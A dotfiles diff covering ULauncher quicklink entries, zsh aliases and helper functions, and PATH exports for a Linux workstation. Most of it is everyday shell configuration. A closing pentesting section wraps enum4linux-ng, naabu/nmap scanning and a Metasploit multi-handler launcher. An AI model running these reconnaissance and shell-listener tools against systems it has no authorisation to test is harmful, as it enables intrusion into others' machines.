"protonvpn-quicklink": {
|
||||
"id": "protonvpn-quicklink",
|
||||
"name": "ProtonVPN Connect",
|
||||
"keyword": "vpn",
|
||||
"cmd": "ghostty -e 'protonvpn-cli c US-CO#246'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0003
|
||||
},
|
||||
"btop-quicklink": {
|
||||
"id": "btop-quicklink",
|
||||
"name": "btop System Monitor",
|
||||
"keyword": "btop",
|
||||
"cmd": "ghostty -e btop",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729126000.0001
|
||||
},
|
||||
"htop-quicklink": {
|
||||
"id": "htop-quicklink",
|
||||
"name": "htop System Monitor",
|
||||
"keyword": "htop",
|
||||
"cmd": "ghostty -e htop",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729126000.0002
|
||||
},
|
||||
"github-search-quicklink": {
|
||||
"id": "github-search-quicklink",
|
||||
"name": "GitHub Search",
|
||||
"keyword": "gh",
|
||||
"cmd": "https://github.com/search?q=%s&type=repositories",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1760740000.0001
|
||||
},
|
||||
"lazygit-quicklink": {
|
||||
"id": "lazygit-quicklink",
|
||||
"name": "LazyGit",
|
||||
"keyword": "lg",
|
||||
"cmd": "ghostty -e bash -c 'echo n | lazygit 2>/dev/null || lazygit'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760740000.0002
|
||||
},
|
||||
"navi-quicklink": {
|
||||
"id": "navi-quicklink",
|
||||
"name": "Navi Cheatsheets",
|
||||
"keyword": "navi",
|
||||
"cmd": "ghostty -e navi",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760741000.0001
|
||||
},
|
||||
"yazi-quicklink": {
|
||||
"id": "yazi-quicklink",
|
||||
"name": "Yazi File Manager",
|
||||
"keyword": "yazi",
|
||||
"cmd": "ghostty -e yazi",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/system-file-manager.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760741000.0002
|
||||
},
|
||||
"yazi-short-quicklink": {
|
||||
"id": "yazi-short-quicklink",
|
||||
"name": "Yazi File Manager (short)",
|
||||
"keyword": "yz",
|
||||
"cmd": "ghostty -e yazi",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/system-file-manager.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760741000.0003
|
||||
},
|
||||
"logs-quicklink": {
|
||||
"id": "logs-quicklink",
|
||||
"name": "System Logs Viewer",
|
||||
"keyword": "logs",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== Recent System Logs (journalctl -xe) ===\" && journalctl -xe --no-pager -n 100 | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0001
|
||||
},
|
||||
"ports-quicklink": {
|
||||
"id": "ports-quicklink",
|
||||
"name": "Listening Ports",
|
||||
"keyword": "ports",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== Listening Ports (ss -tuln) ===\" && echo && ss -tuln | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/network-workgroup.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0002
|
||||
},
|
||||
"hugo-deploy-quicklink": {
|
||||
"id": "hugo-deploy-quicklink",
|
||||
"name": "Deploy Website (Hugo)",
|
||||
"keyword": "deploy",
|
||||
"cmd": "ghostty -e zsh -c 'cd ~/github/hugo2 && bash push-deploy.sh; exec zsh'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0003
|
||||
},
|
||||
"gst-quicklink": {
|
||||
"id": "gst-quicklink",
|
||||
"name": "Git Status All Repos",
|
||||
"keyword": "gst",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== Git Status for Common Repos ===\" && for repo in ~/projects/* ~/github/*; do [ -d \"$repo/.git\" ] && echo && echo \"\ud83d\udcc1 $repo\" && git -C \"$repo\" status -s 2>/dev/null; done | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760742000.0004
|
||||
},
|
||||
"status-quicklink": {
|
||||
"id": "status-quicklink",
|
||||
"name": "System Status Dashboard",
|
||||
"keyword": "status",
|
||||
"cmd": "ghostty -e bash -c 'echo \"=== SYSTEM STATUS DASHBOARD ===\" && echo && echo \"\ud83d\udcca System Load:\" && uptime && echo && echo \"\ud83d\udcbe Memory Usage:\" && free -h && echo && echo \"\ud83d\udcbf Disk Usage:\" && df -h / /home 2>/dev/null && echo && echo \"\ud83c\udf10 Listening Ports:\" && ss -tuln | head -10 && echo \"... (type '\\''ports'\\'' for full list)\" && echo && echo \"\ud83d\udcdd Recent Log Errors (last 10):\" && journalctl -p err -n 10 --no-pager 2>/dev/null | tail -10 && echo && echo \"\ud83d\udc33 Docker Containers:\" && (docker ps --format \"table {{.Names}}\\t{{.Status}}\" 2>/dev/null || echo \"Docker not running or not installed\") && echo && echo \"Press any key to exit...\" && read -r _key'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-system-monitor.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0001
|
||||
},
|
||||
"kill-quicklink": {
|
||||
"id": "kill-quicklink",
|
||||
"name": "Kill Process (Fuzzy)",
|
||||
"keyword": "kill",
|
||||
"cmd": "ghostty -e bash -c 'ps aux | fzf --header=\"Select process to kill\" --preview=\"echo {}\" --preview-window=down:3:wrap | awk \"{print \\$2}\" | xargs -r kill; exec bash'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/process-stop.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0003
|
||||
},
|
||||
"ulrl-quicklink": {
|
||||
"id": "ulrl-quicklink",
|
||||
"name": "Restart ULauncher",
|
||||
"keyword": "ulrl",
|
||||
"cmd": "systemctl --user restart ulauncher.service",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/view-refresh.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0004
|
||||
},
|
||||
"hugo-server-quicklink": {
|
||||
"id": "hugo-server-quicklink",
|
||||
"name": "Hugo Server",
|
||||
"keyword": "hugo",
|
||||
"cmd": "ghostty -e bash -c 'cd /home/e/github/hugo2/hugoplate && echo \"Starting Hugo server at http://localhost:1313\" && echo \"Press Ctrl+C to stop\" && hugo server --bind 0.0.0.0 --baseURL http://localhost:1313 -D; exec bash'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760743000.0005
|
||||
},
|
||||
"youtube-dl-quicklink": {
|
||||
"id": "youtube-dl-quicklink",
|
||||
"name": "Download YouTube Video",
|
||||
"keyword": "dl",
|
||||
"cmd": "ghostty -e bash -c 'cd ~/Videos/Downloaded && yt-dlp \"%s\" && echo && echo \"Download complete! Saved to ~/Videos/Downloaded\" && echo \"Press any key to exit...\" && read -r _key; exec bash'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/folder-download.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1760743000.0006
|
||||
},
|
||||
"obsidian-search-quicklink": {
|
||||
"id": "obsidian-search-quicklink",
|
||||
"name": "Obsidian Fuzzy Search",
|
||||
"keyword": "o",
|
||||
"cmd": "ghostty -e zsh -c 'result=$(rg -l \"%s\" ~/Documents/Obsidian-Fabric ~/Documents/Kamrui_Obsidian --type md 2>/dev/null | fzf --header=\"Select note to open\" --preview=\"bat --color=always --style=numbers {}\"); [ -n \"$result\" ] && xdg-open \"$result\"'",
|
||||
"icon": "/usr/share/icons/hicolor/scalable/apps/obsidian-icon.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1760744000.0002
|
||||
},
|
||||
"git-diff-quicklink": {
|
||||
"id": "git-diff-quicklink",
|
||||
"name": "Git Diff Viewer",
|
||||
"keyword": "diff",
|
||||
"cmd": "ghostty -e zsh -c 'git diff --color=always | less -R'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0003
|
||||
},
|
||||
"clipboard-quicklink": {
|
||||
"id": "clipboard-quicklink",
|
||||
"name": "Clipboard Editor",
|
||||
"keyword": "clip",
|
||||
"cmd": "ghostty -e zsh -c 'tmpfile=$(mktemp /tmp/clipboard.XXXXXX); xclip -o -selection clipboard > \"$tmpfile\"; hx \"$tmpfile\"; cat \"$tmpfile\" | xclip -selection clipboard; rm \"$tmpfile\"'",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/edit-paste.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0004
|
||||
},
|
||||
"wifi-quicklink": {
|
||||
"id": "wifi-quicklink",
|
||||
"name": "WiFi Network Manager",
|
||||
"keyword": "wifi",
|
||||
"cmd": "ghostty -e nmtui",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/network-wireless.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0005
|
||||
},
|
||||
"bluetooth-quicklink": {
|
||||
"id": "bluetooth-quicklink",
|
||||
"name": "Bluetooth Manager",
|
||||
"keyword": "bt",
|
||||
"cmd": "ghostty -e bluetoothctl",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/bluetooth.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0006
|
||||
},
|
||||
"weather-quicklink": {
|
||||
"id": "weather-quicklink",
|
||||
"name": "Weather Report",
|
||||
"keyword": "weather",
|
||||
"cmd": "ghostty -e /home/e/.claude/commands/weather-wrapper.sh",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/weather-clear.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760744000.0007
|
||||
},
|
||||
"d2433c00-43fd-424c-8e82-6f3d132708f2": {
|
||||
"id": "d2433c00-43fd-424c-8e82-6f3d132708f2",
|
||||
"name": "weather-test",
|
||||
"keyword": "w",
|
||||
"cmd": "ghostty -e '/home/e/.bun/bin/bun /home/e/.claude/commands/weather-report.md && read \"Press Enter to exit...\"'",
|
||||
"icon": null,
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1760845029.8644536
|
||||
},
|
||||
"17ff09ab-cd33-4900-9626-e18f81647d8f": {
|
||||
"id": "17ff09ab-cd33-4900-9626-e18f81647d8f",
|
||||
"name": "Progress Bar",
|
||||
"keyword": "pb",
|
||||
"cmd": "ghostty -e '/home/e/.bun/bin/bun /home/e/.claude/commands/progress.md && read \"Press Enter to exit...\"'",
|
||||
"icon": null,
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1761198481.905308
|
||||
},
|
||||
"57fbe6b9-7da4-4e31-8d94-7128d4a071e4": {
|
||||
"id": "57fbe6b9-7da4-4e31-8d94-7128d4a071e4",
|
||||
"name": "SimpleX",
|
||||
"keyword": "simplex",
|
||||
"cmd": "ghostty -e 'nohup simplex &'",
|
||||
"icon": null,
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1762414155.4334407
|
||||
}
|
||||
}
|
||||
325
zsh/.aliases
325
zsh/.aliases
|
|
@ -1,7 +1,8 @@
|
|||
# ~/dotfiles/aliases.sh
|
||||
|
||||
# ---- PAI Commands -----
|
||||
alias cmd='bun ~/.claude/commands/cmd.ts'
|
||||
alias cmd='bun ~/.claude/commands/cmd.md'
|
||||
alias freq='~/.claude/skills/frequency-therapy/tools/freq'
|
||||
|
||||
# ---- Fabric -----
|
||||
|
||||
|
|
@ -21,14 +22,27 @@ yt() {
|
|||
fabric -y "$video_link" $transcript_flag
|
||||
}
|
||||
|
||||
for pattern_file in "$HOME"/.config/fabric/patterns/*; do
|
||||
# Get the base name of the file (i.e., remove the directory path)
|
||||
pattern_name=$(basename "$pattern_file")
|
||||
# Create an alias in the form: alias pattern_name="fabric --pattern pattern_name"
|
||||
alias_command="alias $pattern_name='fabric --pattern $pattern_name'"
|
||||
# Evaluate the alias command to add it to the current shell
|
||||
eval "$alias_command"
|
||||
done
|
||||
# Fabric pattern aliases removed - now using lazy loading in ~/.zshenv
|
||||
# (command_not_found_handler automatically detects fabric patterns)
|
||||
|
||||
# ----------------------------
|
||||
# Sudo Wrapper with PATH Preservation
|
||||
# ----------------------------
|
||||
|
||||
# Preserve PATH when using sudo with user-installed tools
|
||||
# Usage: S uv pip install something --system (capital S)
|
||||
alias S='sudo env PATH="$PATH"'
|
||||
|
||||
# ----------------------------
|
||||
# Python Package Managers Quick Reference
|
||||
# ----------------------------
|
||||
# pip/pip3/uv → Venv-focused (use for projects)
|
||||
# pipx → CLI tools (use for global tools like yt-dlp, black, ruff)
|
||||
# S uv → System install with PATH preserved (only when pipx won't work)
|
||||
|
||||
# Pipx management aliases
|
||||
alias U='pipx upgrade-all' # Update all pipx packages
|
||||
alias P='pipx list' # List pipx packages
|
||||
|
||||
# --- OpenCode ---
|
||||
|
||||
|
|
@ -94,6 +108,9 @@ fi
|
|||
alias a='~/arsenal/run -t'
|
||||
alias any='~/AnythingLLMDesktop/start'
|
||||
alias c='clear'
|
||||
alias ..='cd ..'
|
||||
alias ...='cd ../..'
|
||||
alias ....='cd ../../..'
|
||||
# Copy a file's contents to the clipboard.
# Fixed: useless use of cat — redirect the file straight into pbcopy.
cpy() {
  pbcopy < "$1"
}
|
||||
|
|
@ -106,24 +123,29 @@ alias f='fabric'
|
|||
#}
|
||||
alias i='sudo apt install'
|
||||
alias j='journalctl -f'
|
||||
alias jj='pbpaste | jsonpp | pbcopy'
|
||||
alias jjj='pbpaste | jsonpp'
|
||||
# Note: jj is now a script in ~/scripts/ (upgraded from alias)
|
||||
# For quick clipboard pretty-print, still use: pbpaste | jq . | pbcopy
|
||||
alias jjj='pbpaste | jq .' # Quick view (no copy back)
|
||||
alias k='kill $(ps aux | fzf | awk '\''{print $2}'\'')'
|
||||
# alias k9='kill -9 **'
|
||||
alias nano='hx'
|
||||
alias nf='fzf -m --preview="bat --color=always --style=numbers --line-range:300 {}" --bind "enter:become(hx {+})"'
|
||||
alias oc='opencode'
|
||||
alias p='parallel'
|
||||
|
||||
alias rec='parecord --device=alsa_output.pci-0000_00_1f.3.analog-stereo.monitor \
|
||||
alias rec='meeting-record' # Override for transcription
|
||||
alias rec-audio='parecord --device=alsa_output.pci-0000_00_1f.3.analog-stereo.monitor \
|
||||
--file-format=wav ~/recordings/meeting-$(date +%Y%m%d-%H%M%S).wav'
|
||||
alias rm='rm -I'
|
||||
|
||||
if [[ -n "$ZSH_VERSION" ]]; then
|
||||
alias s='source ~/.zshrc; source ~/.aliases'
|
||||
alias s='source ~/.zshrc' # zshrc already sources ~/.aliases and ~/.exports
|
||||
elif [[ -n "$BASH_VERSION" ]]; then
|
||||
alias s='source ~/.bashrc; source ~/.aliases'
|
||||
alias s='source ~/.bashrc' # bashrc already sources ~/.aliases
|
||||
fi
|
||||
|
||||
alias sa='source ~/.aliases'
|
||||
|
||||
alias ta='tmux attach -t'
|
||||
alias trim="awk '{\$1=\$1;print}'"
|
||||
alias up='sudo apt update && sudo apt upgrade -y'
|
||||
|
|
@ -161,7 +183,7 @@ unalias dl 2>/dev/null
|
|||
# Render a file with bat and send the result to the X clipboard.
batclip() {
  local target="$1"
  bat "$target" | xclip
}
|
||||
alias du='dust'
|
||||
# alias du='dust'
|
||||
alias dfh='gdu -dn'
|
||||
dl() {
|
||||
yt-dlp -f best "$1"
|
||||
|
|
@ -226,11 +248,8 @@ alias tb='task burndown.daily'
|
|||
# Miscellaneous
|
||||
# ----------------------------
|
||||
|
||||
note() {
|
||||
echo "date: $(date)" >> "$HOME"/drafts.txt
|
||||
echo "$@" >> "$HOME"/drafts.txt
|
||||
echo "" >> "$HOME"/drafts.txt
|
||||
}
|
||||
# Note: note() is now a script in ~/scripts/ (upgraded from function)
|
||||
# Old notes are still in ~/drafts.txt if you need them
|
||||
|
||||
help() {
|
||||
if builtin help "$1" &>/dev/null; then
|
||||
|
|
@ -272,6 +291,7 @@ fi
|
|||
# fi
|
||||
|
||||
alias l='eza -lah --icons'
|
||||
alias sl='eza'
|
||||
|
||||
if command -v exa &> /dev/null; then
|
||||
alias ls='exa'
|
||||
|
|
@ -283,6 +303,10 @@ fi
|
|||
|
||||
if command -v eza &> /dev/null; then
|
||||
alias lg='eza -lah --icons --git -a'
|
||||
# Newest files first (like ls -ltr but reversed to show newest at bottom)
|
||||
alias ltr='eza --color=always -lrsnew'
|
||||
alias snew='eza --color=always -lrsnew | head -20' # Newest 20 files
|
||||
alias lnew='eza --color=always -lsnew | tail -20' # Newest 20 at bottom
|
||||
fi
|
||||
|
||||
# Fallbacks if neither exa nor eza are found
|
||||
|
|
@ -319,7 +343,7 @@ alias serve='python3 -m http.server 80'
|
|||
# --------------------------------------
|
||||
|
||||
alias xh='xh --style auto'
|
||||
alias myip='curl ifconfig.me'
|
||||
# Note: myip is now a script in ~/scripts/ (upgraded from alias)
|
||||
alias localip="ip a | grep inet"
|
||||
|
||||
if command -v mtr &> /dev/null; then
|
||||
|
|
@ -330,7 +354,7 @@ fi
|
|||
|
||||
alias net='bandwhich'
|
||||
alias sniff='sudo tcpdump -i any -n'
|
||||
alias ports='ss -tuln'
|
||||
# Note: ports is now a script in ~/scripts/ (upgraded from alias)
|
||||
alias psnet='sudo netstat -tulnp'
|
||||
alias fire='sudo ufw status verbose'
|
||||
alias logs='sudo tail -f /var/log/syslog'
|
||||
|
|
@ -398,3 +422,260 @@ baserow_api() {
|
|||
"http://baserow:3000/api/${endpoint}" \
|
||||
"$@"
|
||||
}
|
||||
alias docker-compose="docker compose"
|
||||
|
||||
# ----------------------------
|
||||
# Manual Redshift Control (Nuclear Option - 2025-10-16)
|
||||
# ----------------------------
|
||||
alias night='redshift -O 2600 -P && echo "🌙 Night mode activated (2600K)"'
|
||||
alias day='redshift -x && echo "☀️ Day mode activated (reset to default)"'
|
||||
alias evening='redshift -O 3500 -P && echo "🌅 Evening mode activated (3500K)"'
|
||||
|
||||
# WhisperTux quick launch aliases
|
||||
alias wt='systemctl --user start whispertux'
|
||||
alias wt-stop='systemctl --user stop whispertux'
|
||||
alias wt-status='systemctl --user status whispertux'
|
||||
alias wt-log='journalctl --user -u whispertux -f'
|
||||
alias reload='source ~/.zshrc && echo "✅ Shell reloaded - WhisperTux aliases active"'
|
||||
|
||||
# ----------------------------
|
||||
# Evan Hahn Inspired Utilities (Tier 1)
|
||||
# ----------------------------
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
|
||||
# Copy current directory to clipboard (strips trailing newline)
|
||||
# Copy the current working directory to the clipboard without the
# trailing newline that a bare pwd would add.
cpwd() {
  printf '%s' "$PWD" | pbcopy
}
|
||||
|
||||
# ISO date format for filename prefixes (2025-10-28)
|
||||
# Emit today's date as an ISO prefix (e.g. 2025-10-28), no newline —
# intended for building filenames.
hoy() {
  printf '%s' "$(date '+%Y-%m-%d')"
}
|
||||
|
||||
# Text case conversion
|
||||
alias uppered='tr "[:lower:]" "[:upper:]"'
|
||||
alias lowered='tr "[:upper:]" "[:lower:]"'
|
||||
|
||||
# Print specific line from stdin (usage: cat file | line 10)
|
||||
# Print a specific line (by number) from stdin.
# Usage: cat file | line 10
line() {
  local n="$1"
  sed -n "${n}p"
}
|
||||
|
||||
# Jump to temporary directory
|
||||
# Jump into a fresh temporary directory.
# Fixed: if mktemp fails, bail out instead of handing an empty/garbage
# argument to cd.
tempe() {
  local dir
  dir=$(mktemp -d) || return 1
  cd "$dir" || return 1
}
|
||||
|
||||
# True background execution (suppress ALL output)
|
||||
# Fire-and-forget: run a command detached in the background with every
# stream silenced (survives terminal hangups via nohup).
bb() {
  nohup "$@" &>/dev/null &
}
|
||||
|
||||
# Note: running() is now a script in ~/scripts/ with PID highlighting
|
||||
|
||||
# Quick scratch buffer in editor (temp file)
|
||||
# Open a throwaway scratch buffer: a fresh temp file in $EDITOR
# (falls back to vim when EDITOR is unset or empty).
scratch() {
  local buf
  buf=$(mktemp)
  "${EDITOR:-vim}" "$buf"
}
|
||||
|
||||
# Note: tryna and trynafail are now scripts in ~/scripts/
|
||||
|
||||
# ----------------------------
|
||||
# Claude Code Hook Management
|
||||
# ----------------------------
|
||||
|
||||
# Fix Claude Code hooks when they stop firing
|
||||
# Touches all hook files to force file watcher reload
|
||||
# Usage: fix-hooks (then wait 60s before sending next message)
|
||||
alias fix-hooks='cd ~/.claude && touch settings.json hooks/*.ts && echo "✅ Hooks refreshed - wait 60-90 seconds before next message"'
|
||||
|
||||
# ----------------------------
|
||||
# Column Formatting Function Family
|
||||
# ----------------------------
|
||||
|
||||
# col - Column formatter with custom delimiter (supports files and stdin)
|
||||
# Usage: col <file> [delimiter]
|
||||
# cat file | col [delimiter]
|
||||
# Default delimiter is whitespace
|
||||
# Examples:
|
||||
# col file.txt # Default whitespace delimiter
|
||||
# col file.csv ',' # CSV with comma delimiter
|
||||
# col file.tsv $'\t' # TSV with tab delimiter
|
||||
# cat file.csv | col ',' # Piped input
|
||||
col() {
  # Column formatter with custom delimiter (files and stdin).
  #   col <file> [delimiter]     file input
  #   cmd | col [-] [delimiter]  piped input
  # Default delimiter is whitespace.
  local delim

  if [[ $# -eq 0 ]] || [[ "$1" == "-" ]]; then
    # Explicit stdin mode; optional delimiter is the second argument.
    delim="${2:- }"
    column -t -s "$delim"
  elif [[ -f "$1" ]]; then
    # File mode.
    delim="${2:- }"
    column -t -s "$delim" < "$1"
  elif [[ ! -t 0 ]]; then
    # Bug fix: the documented usage `cat file.csv | col ','` used to fail
    # because the delimiter was mistaken for a filename. With piped stdin
    # and a non-file first argument, treat that argument as the delimiter.
    delim="$1"
    column -t -s "$delim"
  else
    echo "Error: File '$1' not found" >&2
    return 1
  fi
}
|
||||
|
||||
# colp - Explicit piped version (alias for clarity)
|
||||
# Usage: cat file.csv | colp ','
|
||||
# Explicit piped column formatter.
# Usage: cat file.csv | colp ','   (delimiter defaults to a space)
colp() {
  column -t -s "${1:- }"
}
|
||||
|
||||
# cola with the auto-detected header row highlighted in bold cyan.
colah() {
  cola "$1" | sed '1s/^/\x1b[1;36m/; 1s/$/\x1b[0m/'
}
|
||||
|
||||
# cola - Auto-detect delimiter (CSV/TSV/space)
|
||||
# Usage: cola <file>
|
||||
# Automatically detects comma, tab, or space delimiters
|
||||
cola() {
  # Auto-detect the delimiter (tab, comma, or space) of a file by
  # sampling its first line, then align it with column.
  # Usage: cola <file>
  if [[ $# -eq 0 ]]; then
    echo "Usage: cola <file>" >&2
    return 1
  fi

  local file="$1"
  if [[ ! -f "$file" ]]; then
    echo "Error: File '$file' not found" >&2
    return 1
  fi

  # Declaration split from assignment so head's exit status is not
  # masked by 'local'.
  local first_line
  first_line=$(head -n1 "$file") || return 1

  # Detection notes go to stderr so piped output stays clean.
  local delim
  if [[ "$first_line" == *$'\t'* ]]; then
    delim=$'\t'
    echo "# Auto-detected: TSV (tab-delimited)" >&2
  elif [[ "$first_line" == *,* ]]; then
    delim=','
    echo "# Auto-detected: CSV (comma-delimited)" >&2
  else
    delim=' '
    echo "# Auto-detected: Space-delimited" >&2
  fi

  column -t -s "$delim" < "$file"
}
|
||||
|
||||
# colh - Column formatter with highlighted header row
|
||||
# Usage: colh <file> [delimiter]
|
||||
# First row is displayed in bold cyan
|
||||
# Column formatter with a highlighted header row.
# Usage: colh <file> [delimiter] — first row printed in bold cyan.
colh() {
  if [[ $# -eq 0 ]]; then
    echo "Usage: colh <file> [delimiter]" >&2
    return 1
  fi

  local file="$1" delim="${2:- }"

  if [[ ! -f "$file" ]]; then
    echo "Error: File '$file' not found" >&2
    return 1
  fi

  # Header wrapped in ANSI bold-cyan; remaining rows untouched.
  head -n1 "$file" | column -t -s "$delim" | sed 's/^/\x1b[1;36m/; s/$/\x1b[0m/'
  tail -n+2 "$file" | column -t -s "$delim"
}
|
||||
|
||||
# coln - Column formatter with numbered rows
|
||||
# Usage: coln <file> [delimiter]
|
||||
# Adds line numbers like cat -n
|
||||
# Column formatter with numbered rows (like cat -n).
# Usage: coln <file> [delimiter]
coln() {
  (( $# >= 1 )) || { echo "Usage: coln <file> [delimiter]" >&2; return 1; }

  local file="$1" delim="${2:- }"
  [[ -f "$file" ]] || { echo "Error: File '$file' not found" >&2; return 1; }

  column -t -s "$delim" < "$file" | nl -w3 -s' '
}
|
||||
|
||||
# Bonus: CSV/TSV converters
|
||||
# Naive CSV -> TSV converter: replaces every comma with a tab.
# (Does not understand quoted fields; use colj for real CSV parsing.)
csv2tsv() {
  (( $# >= 1 )) || { echo "Usage: csv2tsv <file>" >&2; return 1; }
  tr ',' '\t' < "$1"
}
|
||||
|
||||
# Naive TSV -> CSV converter: replaces every tab with a comma.
tsv2csv() {
  (( $# >= 1 )) || { echo "Usage: tsv2csv <file>" >&2; return 1; }
  tr '\t' ',' < "$1"
}
|
||||
|
||||
# colj - Convert CSV to JSON array (first row = keys)
|
||||
# Convert CSV (file or stdin) to a JSON array; first row supplies keys.
colj() {
  local input
  if [[ $# -eq 0 || "$1" == "-" ]]; then
    input=$(cat)
  else
    if [[ ! -f "$1" ]]; then
      echo "Error: File '$1' not found" >&2
      return 1
    fi
    input=$(cat "$1")
  fi

  # Python's csv module copes with quoted fields containing commas,
  # which naive tr/sed approaches cannot.
  python3 -c '
import csv, json, sys
reader = csv.DictReader(sys.stdin)
print(json.dumps([row for row in reader], indent=2))
' <<<"$input"
}
|
||||
|
||||
# ----------------------------
|
||||
# Reconnaissance & Pentesting Aliases
|
||||
# ----------------------------
|
||||
|
||||
# Note: recon, web-recon, and wes are now scripts in ~/scripts/pentesting/
|
||||
# Access them directly: recon, web-recon, wes
|
||||
|
||||
# Web reconnaissance alias (alternative name)
|
||||
# Web reconnaissance alias (alternative name for web-recon).
# Fixed: forward every argument instead of only the first, so extra
# flags reach the underlying script.
discover() {
  web-recon "$@"
}
|
||||
|
||||
# enum4linux-ng docker wrapper
|
||||
# enum4linux-ng docker wrapper: full enumeration (-A) with colour
# output (-C) against the given target.
e4l() {
  local target="$1"
  docker run --rm -t enum4linux-ng -A -C "$target"
}
|
||||
|
||||
# Naabu + nmap combo (uses pscan if available)
|
||||
# Port-scan helper: prefer the pscan script, fall back to naabu piping
# into nmap ($2 = extra nmap args), otherwise tell the user what to do.
gomap() {
  local target="$1"
  if command -v pscan &>/dev/null; then
    pscan "$target" -v
  elif command -v naabu &>/dev/null; then
    naabu -host "$target" -nmap-cli "nmap $2"
  else
    echo "Install naabu or use pscan script"
  fi
}
|
||||
|
||||
# Metasploit multi-handler
|
||||
# Launch Metasploit with the multi-handler resource script, warning
# (and bailing) when the rc file has not been created yet.
msfl() {
  local rc="$HOME/scripts/multi_handler.rc"
  if [[ ! -f "$rc" ]]; then
    echo -e "\033[0;33m⚠\033[0m multi_handler.rc not found"
    echo "Create it at: ~/scripts/multi_handler.rc"
    return 1
  fi
  msfconsole -r "$rc"
}
|
||||
|
|
|
|||
|
|
@ -4,6 +4,7 @@ export PAGER="${PAGER:-most}"
|
|||
|
||||
# PAI3 Personal AI Infrastructure
|
||||
export PAI_HOME="/home/e"
|
||||
export PAI_DIR="$HOME/.claude" # Added for PAI v0.6.0 compatibility
|
||||
export PATH=$PATH:"$HOME/.claude"
|
||||
export PATH=$PATH:"$HOME/.claude/commands"
|
||||
# export MANPAGER="sh -c 'sed -u -e \"s/\\x1B\[[0-9;]*m//g; s/.\\x08//g\" | bat -p -lman'"\nman 2 select
|
||||
|
|
@ -13,6 +14,7 @@ export LC_ALL=en_US.UTF-8
|
|||
export GOROOT="/usr/local/go"
|
||||
export GOPATH="$HOME/go"
|
||||
export PATH=$PATH:$GOROOT/bin
|
||||
export PATH=$PATH:$HOME/.bun/bin
|
||||
# export STOW_DIR="$HOME/.config"
|
||||
|
||||
# --- fzf ---
|
||||
|
|
@ -41,7 +43,7 @@ export FZF_CTRL_R_OPTS="
|
|||
|
||||
# Path
|
||||
export PATH="$PATH:$HOME/go/bin"
|
||||
export PATH="$PATH:$HOME/.scripts"
|
||||
export PATH="$PATH:$HOME/.scripts:$HOME/scripts"
|
||||
export PATH="$PATH:$HOME/.cargo/bin"
|
||||
export PATH="$PATH:$GOPATH/bin:$GOROOT/bin"
|
||||
export PATH="$PATH:/usr/local/go/bin"
|
||||
|
|
